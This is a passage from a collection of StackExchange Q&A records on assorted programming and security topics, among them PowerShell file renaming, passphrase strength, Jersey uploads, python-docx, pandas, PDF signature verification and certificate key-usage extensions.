-filter *.bad | where-object {$_.creationtime -gt (get-date).addminutes(-10)} | foreach-object {move-item $_.fullname ($_.fullname -replace '.bad','.xml')}\n<\/code>\nAnswer: Assuming that when a file fails twice it will never succeed, then instead of just renaming the .bad files to .xml you could create a tracking file (let's call it .trk). Next time around delete all the old .trk files and any matching .bad files that are still there (since this means that the file failed twice) before tracking the remaining .bad files.\n","meta":{"source":"stackoverflow","title":"Windows batch script to rename and delete files based on extension and time created","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is better to have as password a sentence or first letter of the sentence?\n\nQuestion: Which is better master KeePass password to prevent any type of bruteforce between theses two type of password :\n\nComplete sentence invented by user like : I like cheeseburger,\ntomatoes and fries ! :) \nEach first letter of the word with lower and\nhigher case : Ilcb,tAf!:)\n\nEdit : My hesitation come from the fact that the sentence indeed is longer but, it composed of real words which could be taken from a dictionary.\nShort Answer :\nThanks to @Royce Williams, I can conclude that the best password generation method is random words with some char like :\nshoes, tomatoes ! meal computer car\nComment: Always relevant: https:\/\/www.xkcd.com\/936\/ Although a valid sentence _may_ be easier to guess than random words.\nComment: \"I like cheeseburger, tomatoes and fries\" and \"I love crustless bread, tacos and fruit\" both would be stronger passwords than \"Ilcb,Af\". 
(Not simply because they're longer...)\nComment: Then you have to ask yourself, \"Was cheeseburger 'c' or was it 'cb'?\" \"Did I capitalize the first letter?\" \"What other letters were capitalized?\" and \"Was there an Oxford comma?\" And in my opinion you're better off using an extra word, compared to mangling a passphrase or password with arbitrary capitalization, 1337speak, punctuation mutations, or intentional misspellings. It's not inherently more or less secure (that depends on how large a pool you draw the extra word from) but it sure makes passwords easier to remember.\nAnswer: Neither - they are usually effectively equivalent. \nThis is because:\n\npassword crackers are very aware of non-random, human-understandable passphrases - and can (and do) emulate both subtypes at high speed, and\ninjecting memorable additional sequences like \"!\" and \":)\" is just as well known and \"simulatable\", and\nthe effective entropy of either kind of passphrase-based construction technique once the methodology is known to the attacker are virtually identical.\n\nIt's #3 that is the most important lesson here, and why raw bruteforce is irrelevant: because the effective entropy of this method - how much work a real-world attacker has to perform - is dramatically less than the bruteforce entropy. This is because the psychology of naive password-memorization strategies is well-known to the attacker. \nIn your specific methodology, you only have to remember about eight things to remember the password:\n\nthe fact that you're using a passphrase at all (this is a freebie for the attacker, because they will be attacking passphrases as a class)\nthe rough meaning components of the original phrase (liking, food, and which two foods, perhaps roughly four pieces of information) (since the phrase makes grammatical sense, much of this is also easy for the attacker)\nthe fact that you did or did not use whole words vs the first letters (since there are only a few options here, this isn't hard for the attacker to exhaust both variants)\nthe placement and location of the two additional items (attackers know that people tend to put the special-character \"extra\" stuff at the end)\n\nIf the attacker had no idea at all in the history of password psychology that anyone would ever do this, you'd be in pretty good shape. But attackers know very well how people think about passwords, and what they do to \"chunk\" them into \"memorizable\" components. (In other words, your methodology does not adhere to Kerkhoffs' Principle).\nSo an attacker only has to \"bruteforce\" the psychologically likely effective entropy of your password. The attacker doesn't have to bruteforce all possible characters of length X; instead, they can dramatically reduce the things they have to guess by only trying the same possibilities that make them easier for you to remember. \nBy contrast, the most effective passphrases are random passphrases: five or six words, drawn purely randomly from a wordlist of, say, 20,000 words or more (20,000^5, or 3.2x10^21). Even if the attacker knows everything that you do about the construction methodology - exactly how many words are in the list, and exactly how many words you selected, and how you separated them, etc. - the sheer volume of possibilities is resistant to bruteforce. You only have to memorize five words - but they are so many possibilities that trying them all would take a very, very long time. 
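As a rough back-of-the-envelope sketch, using only the figures already quoted in this answer: 20,000^5 is about 3.2 x 10^21 possibilities, which corresponds to 5 x log2(20,000), or about 71 bits of entropy that an attacker has to search even with complete knowledge of the construction method. 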
If you do the math of this, you'll quickly start to understand.\n(And the concern about \"using words in the dictionary\" is a leftover from old password complexity requirements that were trying to prevent people from using single words from a dictionary. The underlying principle - avoiding \"guessability\" - is a good one, but it's totally OK to use a large number of random words that happen to be in the dictionary)\nAny password system whose strength is based solely on a large amount of randomness will always be stronger than one that isn't.\nComment: I sort of disagree with this answer, since it ignores how human beings actually behave and what they're good\/bad at. Memorizing random things is HARD. People are just terrible at it, and honestly telling people to use 5 random words is just poor advice since nobody is really going to do that. That's why many people advocate a meaningless phrase, which is far better than using a word. Or better yet, use a password manager that generates random characters and protect it with some form of two-factor.\nComment: Passphrase advice is generally confined to specific use cases - passwords that must be memorized (such as for non-web interactive (Windows) login or for password managers), passwords that need to be human-legible or human-audible, etc. For everything else, long, random, and managed by your vault is of course awesome! IMO, five random words is quite manageable for memorization, well within the lower bound of human short-term memory capacity (making rehearsal for transfer into long-term easy). The XKCD method of making up a story to match has a long history of success in memorization training.\n","meta":{"source":"security.stackexchange","title":"Is better to have as password a sentence or first letter of the sentence?","dup_signals":{}},"subset":"stackexchange"} +{"text":"REST- Jersey - Exception obtaining parameters\n\nQuestion: Here is my ajax call:\n<code>uploadExcel : function(jsonData,success, error) {\n var url = \"\/TestProject\/test\/Uploader;\n $.ajaxFileUpload({ \n url : url,\n secureuri : false,\n fileElementId : 'FileUpload',\n contentType : 'multipart\/form-data',\n dataType : 'jsonString',\n processData : false,\n type : 'POST',\n data: jsonData,\n success : success,\n error : error\n });\n}\n<\/code>\nJava Method signature:\n<code>@Path(\"\/Uploader\") \n@POST\n@Consumes('multipart\/form-data')\npublic String validateAndUpload(@FormDataParam(\"FileUpload\") byte[] inputByteArray, \n @Context HttpServletRequest request,\n @FormParam(\"jsonData\") String uploadData) {}\n<\/code>\nHere is the error I'm getting\nHere is the stackTrace:\n<code> SEVERE: Servlet.service() for servlet [ServletAdaptor] in context with path [\/TestProject] threw exception [com.sun.jersey.api.container.ContainerException: Exception obtaining parameters] with root cause\njava.lang.NullPointerException\nat com.sun.jersey.server.impl.inject.InjectableValuesProvider.getInjectableValues(InjectableValuesProvider.java:43)\nat com.sun.jersey.multipart.impl.FormDataMultiPartDispatchProvider$FormDataInjectableValuesProvider.getInjectableValues(FormDataMultiPartDispatchProvider.java:115)\nat com.sun.jersey.server.impl.model.method.dispatch.AbstractResourceMethodDispatchProvider$EntityParamInInvoker.getParams(AbstractResourceMethodDispatchProvider.java:126)\nat com.sun.jersey.server.impl.model.method.dispatch.AbstractResourceMethodDispatchProvider$TypeOutInvoker._dispatch(AbstractResourceMethodDispatchProvider.java:154)\nat 
com.sun.jersey.server.impl.model.method.dispatch.ResourceJavaMethodDispatcher.dispatch(ResourceJavaMethodDispatcher.java:67)\nat com.sun.jersey.server.impl.uri.rules.HttpMethodRule.accept(HttpMethodRule.java:163)\nat com.sun.jersey.server.impl.uri.rules.RightHandPathRule.accept(RightHandPathRule.java:111)\nat com.sun.jersey.server.impl.uri.rules.ResourceClassRule.accept(ResourceClassRule.java:71)\nat com.sun.jersey.server.impl.uri.rules.RightHandPathRule.accept(RightHandPathRule.java:111)\n<\/code>\nAnswer: Try:\n<code>@FormDataParam(\"FileUpload\") InputStream fileInputStream\n<\/code>\nInstead of:\n<code>@FormDataParam(\"FileUpload\") byte[] inputByteArray\n<\/code>\nAccording to <code>FormDataParam<\/code> API, the following is supported:\n<code>@POST\n@Consumes(MediaType.MULTIPART_FORM_DATA_TYPE)\npublic String postForm(\n @DefaultValue(\"true\") @FormDataParam(\"enabled\") boolean enabled,\n @FormDataParam(\"data\") FileData bean,\n @FormDataParam(\"file\") InputStream file,\n @FormDataParam(\"file\") FormDataContentDisposition fileDisposition) {\n ...\n}\n<\/code>\nFrom the javadoc:\n\nWhere the server consumes a <code>multipart\/form-data<\/code> request entity body that contains one optional named body part \"enabled\" and two required named body parts <code>data<\/code> and <code>file<\/code>.\nThe optional part <code>enabled<\/code> is processed as a <code>boolean<\/code> value, if the part is absent then the value will be true.\nThe part <code>data<\/code> is processed as a JAXB bean and contains some meta-data about the following part.\nThe part <code>file<\/code> is a file that is uploaded, this is processed as an <code>InputStream<\/code>. Additional information about the file from the <code>Content-Disposition<\/code> header can be accessed by the parameter <code>fileDisposition<\/code>.\nComment: Found the issue....i commented out `@FormParam(\"jsonData\") String uploadData` and it went through...Im going to try to see what the issue is with that\nComment: Updated my answer. 
Please have a look if it's useful.\n","meta":{"source":"stackoverflow","title":"REST- Jersey - Exception obtaining parameters","dup_signals":{}},"subset":"stackexchange"} +{"text":"Stop cutting a long text in label\n\nQuestion: In\n<code>ListLinePlot[{RandomReal[4, 6], RandomReal[2, 8], RandomReal[10, 12]},\n AxesLabel -> {\"\\!\\(\\*SuperscriptBox[\\(N\\), \\(b\\)]\\) de si\u00e8ges\", \n \"Si\u00e8ges parSyndicat\"}, PlotLabels -> {\"FO\", \"SM\", \"SdM\"}]\n<\/code>\nhow can we guarantee that the Axes Label \n<code>{\"\\!\\(\\*SuperscriptBox[\\(N\\), \\(b\\)]\\) de si\u00e8ges\", \"Si\u00e8ges parSyndicat\"}\n<\/code>\nis not cut like in this example:\nAnswer: Using <code>ImagePadding<\/code>\n<code>ListLinePlot[\n {\n RandomReal[4, 6],\n RandomReal[2, 8],\n RandomReal[10, 12]\n }\n , ImagePadding -> Full\n , AxesLabel -> {\"\\!\\(\\*SuperscriptBox[\\(N\\), \\(b\\)]\\) de si\u00e8ges\", \"Si\u00e8ges parSyndicat\"}\n , PlotLabels -> {\"FO\", \"SM\", \"SdM\"}\n ]\n<\/code>\n\nUsing <code>FrameLabel<\/code>\n<code>ListLinePlot[\n {\n RandomReal[4, 6],\n RandomReal[2, 8],\n RandomReal[10, 12]\n }\n , Frame -> True\n , FrameLabel -> {\"\\!\\(\\*SuperscriptBox[\\(N\\), \\(b\\)]\\) de si\u00e8ges\", \"Si\u00e8ges parSyndicat\"}\n , PlotLabels -> {\"FO\", \"SM\", \"SdM\"}\n ]\n<\/code>\n\nYou should also see the solutions to this other question (7453) .\nHave a look into the documentation of \n\n<code>ImageMargins<\/code>\n<code>ImagePadding<\/code>\n<code>PlotRangePadding<\/code>\n\n All plots were created using Mathematica 11.1.1 On Windows 7. \nComment: for me PlotLabels doesn't work. Did you load a Package to get the Labels? I'm only familiar with PlotLabel, which is doing something different.\nComment: @RMMA `PlotLabels` was introduced in *Mathematica v 10.4*, which version do you have? I did NOT use any packages.\nComment: ok. I'm using 10.3. 
PlotLabels seems to be useful.\n","meta":{"source":"mathematica.stackexchange","title":"Stop cutting a long text in label","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to fire a callback once data reader reads all result\n\nQuestion: I have a class like\n<code>class ReadData{\n public IdataReader Execute(string sql){\n \/\/ Ado.net code here\n return cmd.ExecuteReader();\n }\n}\n<\/code>\nThis is the sample implementation and it works fine.\nI am calling like this in caller\n<code>class caller{\n\n void CallMethod(){\n var reader = Execute(\"Sql query here\");\n while(reader.Read()){\n logic here\n }\n \/\/Here i need to get the out params after reading the resultset.\n \/\/But the impplementation should in the class ReadData.\n \/\/because that class has implementation to get the out params for the \n \/\/other type means, execute without resultset get only output params\n }\n}\n<\/code>\nSome possible ways like calling the first method with callback and in that once the data is read completely then read the out params.\nI don't know how to implement that stuff.\nAny possible better ways to do ?\nPlease help me on this..\nAnswer: <code>public void Execute(string sql, Action<IDataRecord> action)\n{\n using(var connection = new ...)\n {\n connection.Open();\n\n using(var command = new ...)\n {\n using(var reader = command.ExecuteReader())\n {\n while(reader.Read())\n {\n action(reader);\n }\n }\n }\n }\n}\n<\/code>\nThis would allow you to do something like this:\n<code>var entries = List<object>();\n\nExecute(\"Sql query here\", row => entries.Add(row[\"Field\"]));\n<\/code>\nOr you could try a more linqy appraoch:\n<code>public IEnumerable<IDataRecord> Execute(string sql)\n{\n using(var connection = new ...)\n {\n connection.Open();\n\n using(var command = new ...)\n {\n using(var reader = command.ExecuteReader())\n {\n while(reader.Read())\n {\n yield return reader;\n }\n }\n }\n }\n}\n<\/code>\nWhich would allow something like this:\n<code>var list = Execute(\"Sql query here\").Where(row => (int)row[\"Field\"] == 17)).ToList();\n<\/code>\nHowever, this has some weird effects with defered execution if you don't materialize it properly.\nComment: u mean the second approach has got some problem or both the ways ?\nComment: The second approach is for people who know what they are doing. With the first one, it's way harder to make mistakes. Both work fine if used properly.\n","meta":{"source":"stackoverflow","title":"how to fire a callback once data reader reads all result","dup_signals":{}},"subset":"stackexchange"} +{"text":"Replace existing table in Word doc using python docx\n\nQuestion: I have a Word document with the following tables:\n<code>doc = Document('doc_generator.docx')\nprint(doc.tables)\n<\/code>\n[docx.table.Table object at 0x0000017E8B2A0D68, docx.table.Table object at 0x0000017E8B2A0198]\nand I am trying to replace one of the existing tables with a new one.\nWhat I have done is:\n<code>doc.tables[0] = new_table\n<\/code>\nwith new_table being an actual Word docx table, i.e. running:\n<code>type(new_table)\n<\/code>\nreturns:\ndocx.table.Table\nIf I then try to save the updated document via:\n<code>doc.save('Updated.docx')\n<\/code>\nThe table is still not updated. If instead I run a command as e.g. :\n<code>doc.tables[0].add_row()\n<\/code>\nThe table is actually updated in the Word doc. It seems the problem is my assignment statement. Any idea how to solve this? I do want to replace, not edit or update, an existing table with a new one via python-docx. 
Thanks in advance.\nAnswer: You could use the .replace method for the parent xml object:\n<code>doc.element.body.replace(old_table._element, new_table._element)\n<\/code>\nWhere both 'old_table' and 'new_table' are docx.table.Table objects. The ._element attribute accesses the table object within the doc's xml structure.\nIf doc.element.body is not the parent element of the table, you can find the parent using:\n<code>old_table._element.getparent()\n<\/code>\n","meta":{"source":"stackoverflow","title":"Replace existing table in Word doc using python docx","dup_signals":{}},"subset":"stackexchange"} +{"text":"Sum of row and columns as x and y axis\n\nQuestion: I'm a beginner in using python and encountered a problem I hope you can help me with:\nBelow you can see an example code I have made for plotting a matrix in which the y-axis is presented on the left and the x-axis on top. What I would like is to have at the x-axis on the bottom beneath every column the sum of that column and for the y-axis on the right for every row the sum of that row. \nThis would mean that for the first row I want the number 39 as y-label and for the first column I want 39 as x-label. \nI hope someone can help me with this problem\n<code>import numpy as np\nimport matplotlib.pyplot as plt\n\nconf_arr = [[33,2,0,0,0,0,0,0,0,1,3], \n [3,31,0,0,0,0,0,0,0,0,0], \n [0,4,41,0,0,0,0,0,0,0,1], \n [0,1,0,30,0,6,0,0,0,0,1], \n [0,0,0,0,38,10,0,0,0,0,0], \n [0,0,0,3,1,39,0,0,0,0,4], \n [0,2,2,0,4,1,31,0,0,0,2],\n [0,1,0,0,0,0,0,36,0,2,0], \n [0,0,0,0,0,0,1,5,37,5,1], \n [3,0,0,0,0,0,0,0,0,39,0], \n [0,0,0,0,0,0,0,0,0,0,38]]\n\nnorm_conf = []\nfor i in conf_arr:\n a = 0\n tmp_arr = []\n a = sum(i, 0)\n for j in i:\n tmp_arr.append(float(j)\/float(a))\n norm_conf.append(tmp_arr)\n\nfig = plt.figure()\nplt.clf()\nax = fig.add_subplot(111)\nax.set_aspect(1)\nres = ax.imshow(np.array(norm_conf), cmap=plt.cm.OrRd, \n interpolation='nearest')\n\nwidth = len(conf_arr)\nheight = len(conf_arr[0])\n\nfor x in xrange(width):\n for y in xrange(height):\n ax.annotate(str(conf_arr[x][y]), xy=(y, x), \n horizontalalignment='center',\n verticalalignment='center')\n\nax.xaxis.tick_top()\ncb = fig.colorbar(res)\nalphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nplt.ylabel('True Landform (value explanation in info)')\nplt.xticks(range(width), alphabet[:width])\nplt.yticks(range(height), alphabet[:height])\nplt.savefig('confusion_matrix.png', format='png')\nplt.show()\n<\/code>\nAnswer: You can sum row #i using this command:\n<code>sum(conf_arr[i])\n<\/code>\nRemember, in python counting starts from 0 (and not 1 like Matlab).\nTo invert the matrix, you can use \n<code>zip(*conf_arr)\n<\/code>\nAnd then you may sum row #i (which would be in fact column #i).\nComment: I do understand now how to get the sum of each row, but how do I plot those values in a plot of the confusion matrix??\n","meta":{"source":"stackoverflow","title":"Sum of row and columns as x and y axis","dup_signals":{}},"subset":"stackexchange"} +{"text":"Selenium (C#) - How to get a string of the elements attributes\n\nQuestion: Is there a way to get a string of all the attributes that are within a particular element?\nFor example, let's say my element is the following in the webpage:\n<code><input id=\"SandBox1\" checked=\"\" class=\"float_right red white_stripes\" value =\"654288\">\n<\/code>\nIf it possible to get a string variable from this where it would have the attribute names and their values all in one string?\nComment: With your given example, what is your expected 
string?\nComment: The string that I was hoping to get was something like this:\nid=\"SandBox1\" checked=\"\" class=\"float_right red white_stripes\" value =\"654288\"\nComment: Using javascript executor with the following query: Element.outerHTML\nComment: What is your exact business case? Why are you looking for `id=\"SandBox1\" checked=\"\" class=\"float_right red white_stripes\" value =\"654288\"` dropping the `` tag?\nComment: @DebanjanB Well, the issue that I'm having is trying to find out if a particular attribute in the tag is present. And based on if it is present, I would like to perform a certain action that would follow different logic then if it wasn't there.\nAnswer: Below code should do that for you.\n<code>IJavaScriptExecutor js = (IJavaScriptExecutor)driver;\nvar elem = driver.FindElement(By.Id(\"SandBox1\"));\n\nstring attributes = (string)js.ExecuteScript(\"var re = \/<[^ ]+([^>]+)\/i; return re.exec(arguments[0].outerHtml)[1];\", elem);\n<\/code>\nBut it would in cases where attributes also have a <code>><\/code> in the value\nComment: I think this is what I'm looking for, but I ran it a couple of times and the string keeps coming up null. I'll keep experimenting with it though and get back to you on this.\nComment: can you try replacing `outerHtml` with `outerHTML`?\n","meta":{"source":"stackoverflow","title":"Selenium (C#) - How to get a string of the elements attributes","dup_signals":{}},"subset":"stackexchange"} +{"text":"How the \"top 2% this week\" was calculated?\n\nQuestion: I've got \"top 2% this week\" on the Raspberry Pi community. I've read some posts about what does top x% this week means and I don't find the answer to this question.\nIn addition, on Raspberry Pi User Reputation League, my account is the first one this week.\nHow this 2% was calculated?\nAnswer: \nHow this 2% was calculated?\n\nThe reputation points you accrued during that time period.\nComment: Thank you for your attention and your response. Now I got that the less the number, the better the rank.\n","meta":{"source":"raspberrypi.meta.stackexchange","title":"How the \"top 2% this week\" was calculated?","dup_signals":{}},"subset":"stackexchange"} +{"text":"I have a table with a time index. I want to choose from it only some of the days that are not continuous I did so and did not work\n\nQuestion: that is my date I want to choose\n<code>myDates=['2021-02-24', '2021-02-26','2021-02-27', '2021-03-06', '2021-04-4', '2021-04-05', '2021-04-06',\n '2021-04-07', '2021-04-08','2021-04-13', '2021-04-14', '2021-04-15', '2021-04-16','2021-04-17',\n '2021-04-22','2021-04-23', '2021-04-28', '2021-04-29', '2021-04-30', '2021-05-02', '2021-05-03',\n '2021-05-04' ,'2021-05-05', '2021-05-06', '2021-05-08']\n<\/code>\nchange them to date time\n<code>myDates=pd.to_datetime(myDates)\n<\/code>\nand trying to use <code>.loc<\/code> function\n<code>df1=df.loc[myDates]\n<\/code>\nI get that message\n\n'Passing list-likes to .loc or [] with any missing labels is no longer supported, see https:\/\/pandas.pydata.org\/pandas-docs\/stable\/user_guide\/indexing.html#deprecate-loc-reindex-listlike'\nComment: also post some samples from your df\/\nAnswer: in regards to your issue, you're trying to apply a pandas operation on a list, that won't work. 
you first need to create a pandas object.\nuse a boolean filter in a dataframe and <code>diff()<\/code>\nassuming your dataframe looks like this :\n<code>myDates=['2021-02-24', '2021-02-26','2021-02-27', '2021-03-06', '2021-04-4', '2021-04-05', '2021-04-06', '2021-04-07', '2021-04-08','2021-04-13', '2021-04-14', '2021-04-15', '2021-04-16','2021-04-17', '2021-04-22','2021-04-23', '2021-04-28', '2021-04-29', '2021-04-30', '2021-05-02', '2021-05-03', '2021-05-04' ,'2021-05-05', '2021-05-06', '2021-05-08']\n\nmyDates=pd.to_datetime(myDates)\n<\/code>\n\n<code>df = pd.DataFrame(myDates)\nprint(df.head(5))\n 0\n0 2021-02-24\n1 2021-02-26\n2 2021-02-27\n3 2021-03-06\n4 2021-04-04\n<\/code>\n\n<code>df[df[0].diff().gt('1 days')]\n\n 0\n1 2021-02-26\n3 2021-03-06\n4 2021-04-04\n9 2021-04-13\n14 2021-04-22\n16 2021-04-28\n19 2021-05-02\n24 2021-05-08\n<\/code>\n\n<code>print(df.assign(diff=df[0].diff()))\n\n 0 diff\n0 2021-02-24 NaT\n1 2021-02-26 2 days\n2 2021-02-27 1 days\n3 2021-03-06 7 days\n4 2021-04-04 29 days\n5 2021-04-05 1 days\n6 2021-04-06 1 days\n7 2021-04-07 1 days\n8 2021-04-08 1 days\n9 2021-04-13 5 days\n10 2021-04-14 1 days\n11 2021-04-15 1 days\n12 2021-04-16 1 days\n13 2021-04-17 1 days\n14 2021-04-22 5 days\n15 2021-04-23 1 days\n16 2021-04-28 5 days\n17 2021-04-29 1 days\n18 2021-04-30 1 days\n19 2021-05-02 2 days\n20 2021-05-03 1 days\n21 2021-05-04 1 days\n22 2021-05-05 1 days\n23 2021-05-06 1 days\n24 2021-05-08 2 days\n<\/code>\nComment: firs of all thank you for your responses . but what i want to do is to choose that specific dates (myDates) from the bigger df that contain the info i need. the bigger df have time index from 2021-02-24 to the 2021-05-10 so i want to separate that times to a new dataframe\nComment: @ImriZadak please see [mcve] and [ask] you need to provide a proper example.\n","meta":{"source":"stackoverflow","title":"I have a table with a time index. I want to choose from it only some of the days that are not continuous I did so and did not work","dup_signals":{}},"subset":"stackexchange"} +{"text":"What security do digital signatures provide (like used when signing PDFs)?\n\nQuestion: I want to ask you one question about digital signatures as they are (for example) used when digitally signing PDFs.\nWe know that if our document has a digital signature, we can detect if the original document has been altered or not. And if we want to prove owner identity, we use digital signatures.\nOn the other hand, it's very simple to remove a certificate from the document, and change it (because the document itself will not be altered, due to the certificate not being in the byte range of which the hash is encrypted as a digital signature). \nSo, what security do digital signatures provide (to - for example - PDFs)? Or am I missing something?\nAnswer: You've stumbled on the requirement for authentication.\nRecall that signature schemes have a private key and a public key. The private key is used to sign the document in question, and the public key is given to the verifying party so that they can verify that the signature is correct.\nYou're correct that it is possible to strip a digital signature and replace it with a fake one from, say, a different key. To defeat this, the verifying party needs to check that it has the correct public key to verify the signature. 
For example, the signer might coordinate with the verifying party a week ahead of time, in real life, and exchange keys physically (here, you could use some form of ID as authentication, since IDs include pictures). Or they might take the SSL route and use third-party certificate authorities. At any rate, they need some way to obtain the correct public key.\nThen, if a man-in-the-middle attacker has replaced the signature with a fake one from the wrong key, when the verifying party attempts to verify the signature against their known-good public key, the verification will fail. The point here is that only the (proper) signing party knows the private key associated with the known-good public key, so only the signing party can generate an authenticate signature that will match that public key.\nThus, simply checking that a digital signature is present is not enough; one needs to computationally verify that the signature is correct using an authenticated public key, i.e. one that the verifying party knows for sure is \"owned\" by the alleged signer.\n","meta":{"source":"crypto.stackexchange","title":"What security do digital signatures provide (like used when signing PDFs)?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Difference between certificates with \"extension fields\" and \"Non Repudiation\" usage\n\nQuestion: For example we have two certificate pairs:\n\nFirst pair:\n\nServer cert with \"Non Repudiation\" (sometimes called Content Commitment) usage,\nClient cert without any \"extension fields\".\n\nSecond pair:\n\nServer cert with \"TLS Web Server Authentication\" usage,\nClient cert with \"TLS Web Client Authentication\" usage.\n\nBoth clients can authenticate against server. But what is the difference between all these methods? Does certificate with \"Non Repudiation\" usage allow to authenticate all clients with\/without \"TLS Web Client Authentication\" usage?\nBut \"TLS Web Server Authentication\" without \"Non Repudiation\" allows to auth clients only with \"TLS Web Client Authentication\" usage?\nIs it correct?\nComment: What is the real question here? You need to be a little more specific. Thanks!\nAnswer: The extensions are only some kind of policy meta-data attached to the certificate. Technically, no matter the extensions, a certificate remains the same thing: a file linking a key to an identity. Its information could be used for any purpose: authenticating a server, a client, signing other certificates, signing emails, signing software\/driver code, etc.\nThat's where extensions enters into play: they tell the application which usages are applicable to this certificate, so that when the application encounters the certificate in an unauthorized context it could (or must, depending if the usage is set to critical or not) consider the certificate as invalid and refuse it.\nHowever, this check must be done at the application level. A poorly implemented application may not check these usages properly and accept any certificate at any time.\nAlso, few supplementary things must be noted:\n\nThese extension are only restriction. 
A certificate with no extension is allowed to be used in any role (no usage limitation), while a certificate containing some extension is restricted to the usage defined by these extensions,\nTheses extension are actually divided in two main parts (plus one merely hstorical):\n\nThe key usage (like \"Non-repudiation\" in you example) defines lower-level cryptography usage allowed for this certificate,\nThe extended key usage provides a higher level usage authorized for this certificate (\"TLS Web Server Authentication\" and \"TLS Web Client Authentication\" in your examples).\nSome applications also handle what's called Netscape Cert Type, it can be seen as the precursor of the extended key usages and gather usages such as \"SSL Server\", \"SSL Client\", etc.\n\nAll of these key usages may be associated and used in a complementary way.\nSome extension might be flagged as \"critical\": this flag determine how an application not recognizing \/ having not implemented a specific extension must handle the certificate. Under such situation, if the \"critical\" flag is enabled the application must reject the certificate, when this flag is not set the application may still accept the certificate.\n\nExtended key usages names (as well as Netscape cert type) are rather straightforward to understand. Key usages however deeply depend on how the protocol (in case of a network communication) will use the certificates. Commonly found key usages for a SSL\/TLS client\/server application are the following ones:\n\nServer: Digital Signature, Non Repudiation, Key Encipherment,\nClient: Digital Signature, Key Encipherment, Data Encipherment.\n\nSo, to answer to your edited questions:\n\nDoes certificate with \"Non Repudiation\" usage allow to authenticate all clients with\/without \"TLS Web Client Authentication\" usage?\nBut \"TLS Web Server Authentication\" without \"Non Repudiation\" allows to auth clients only with \"TLS Web Client Authentication\" usage?\n\nThe \"Non Repudiation\" usage from the server's certificate will be mostly checked by client software, not by the server, and it will have no impact on the way the server will validate client's certificates.\n\"TLS Web Client Authentication\" usage will prevent client's certificates from being used in a server context. It's absence will not block any authentication. However, if a client tries to authenticate using a certificate without this usage but with \"TLS Web Server Authentication\" instead then the authentication will most likely be refused by the server.\n","meta":{"source":"security.stackexchange","title":"Difference between certificates with \"extension fields\" and \"Non Repudiation\" usage","dup_signals":{}},"subset":"stackexchange"} +{"text":"Common exponent problem related to discrete logarithms assuming Diffie Hellman oracle\n\nQuestion: Let $g$ be a generator of multiplicative group mod $p$ a prime.\nSuppose we know\n$$g^{a+km_1}\\bmod p$$\n$$g^{b-km_2}\\bmod p$$\n$$g^{a+k'm_3}\\bmod p$$\n$$g^{b-k'm_4}\\bmod p$$\nwhere $m_2m_3-m_4m_1=\\phi(p)$ where $\\phi$ is Totient and $a,b,k,k'$ are the only unknown and all of $a$ through $m_4$ are of size $\\sqrt p$ (we know $m_1$ through $m_4$ over $\\mathbb Z$) can we identify $g^a$, $g^b$ in polynomial time?\nWe are allowed to assume a Diffie Hellman oracle?\nComment: Is this a homework assignment? Or, is this a 'hard problem' you came up with when analyzing a crypto protocol?\nComment: It is a hard problem... I am unable to make progress. 
I do not know if it has a solution.\nComment: hard problem == Homework assingment?\nComment: \"I do not know if it has a solution\" == research.\nAnswer: Well, one obvious observation is that, if we call the four revealed values $C_1, C_2, C_3, C_4$ (so $C_1 = g^{a+km_1}$), then:\n$$C_1^{-m_4} \\cdot C_2^{m_3} \\cdot C_3^{m_2} \\cdot C_4^{-m_1} = (g^a)^{m_2-m_4} \\cdot (g^b)^{m_3-m_1}$$\nThis can be used to distinguish a guess of $g_a, g_b$ from the correct values; hence if \"can we identify\" means \"distinguish\", then yes, we can do that.\nI don't know if there is a way to add a second observation which would allow you to recover the $g^a, g^b$ values.\nComment: That's a necessary condition on $g^a$ and $g^b$, but not a sufficient one. For example the pair $g^{a+m_3-m_1}$ and $g^{b-m_2+m_4}$ would also pass this test.\nComment: What if we assume DH oracle? I think it may not be necessary though.\nComment: @Turbo A DH oracle will not change the fact that there is a large family of solutions that pass poncho's test and any other test that relies on exponentiating and multiplying the $C_i$. Indeed this family allows us to take any arbitrary value for $g^a$ and find putative values for $g^b$, $g^k$ and $g^{k'}$ that pass all such tests.\nComment: @DanielS But DH operations are not BB.. so may be there is hope?\nComment: I think it should be $C_1^{m_4} \\cdot C_2^{m_3} \\cdot C_3^{m_2} \\cdot C_4^{m_1} = (g^a)^{m_2+m_4} \\cdot (g^b)^{m_3+m_1}$ in Poncho's approach. Or else the problem gets trivially solved.\nComment: @DanielS It is unclear to me why DH cannot give benign relations as in Poncho's errored identity. Following works if Poncho's identity held.\nComment: $$C_1^{-m_4} \\cdot C_2^{m_3} \\cdot C_3^{m_2} \\cdot C_4^{-m_1} = (g^a)^{m_2-m_4} \\cdot (g^b)^{m_3-m_1}\\equiv(g^a)^{m_2-m_4} \\cdot (g^{bm_1})^{\\frac{m_3-m_1}{m_1}}$$\n$$\\equiv(g^a)^{m_2-m_4} \\cdot (g^{am_2+bm_1})^{\\frac{m_3-m_1}{m_1}}\\cdot (g^{-am_2})^{\\frac{m_3-m_1}{m_1}}$$\n$$\\equiv(g^a)^{m_2-m_4-m_2\\frac{m_3-m_1}{m_1}} \\cdot (g^{am_2+bm_1})^{\\frac{m_3-m_1}{m_1}}\\bmod p$$\n\n$$\\implies g^a\\equiv\\Big((C_1^{-m_4} \\cdot C_2^{m_3} \\cdot C_3^{m_2} \\cdot C_4^{-m_1})\\cdot(g^{am_2+bm_1})^{\\frac{m_3-m_1}{m_1}}\\Big)^{\\frac1{m_2-m_4-m_2\\frac{m_3-m_1}{m_1}}}\\bmod p$$\nComment: @poncho Perhaps DH can give identities which help.\nComment: The point here is that your first five equations give a system of four unknowns with three constraints so that there is an infinite family of solutions to the five equations. A DH oracle will allow you to form polynomial identities rather than just linear identities, but if the identities are based on the system of five equations all non-causal solutions will also satisfy them.\nComment: @DanielS I see. What do you mean by non-causal solutions?\nComment: @DanielS also note given $a+km$ we can get $a$ through modular arithmetic.. but here we have $g^{a+km}\\bmod p$.\nComment: Let us [continue this discussion in chat](https:\/\/chat.stackexchange.com\/rooms\/134667\/discussion-between-daniel-s-and-turbo).\nAnswer: I think not. If we could extend such a construction to black box group, it would give a $q^{1\/4}$ method for solving discrete logarithms in that group. 
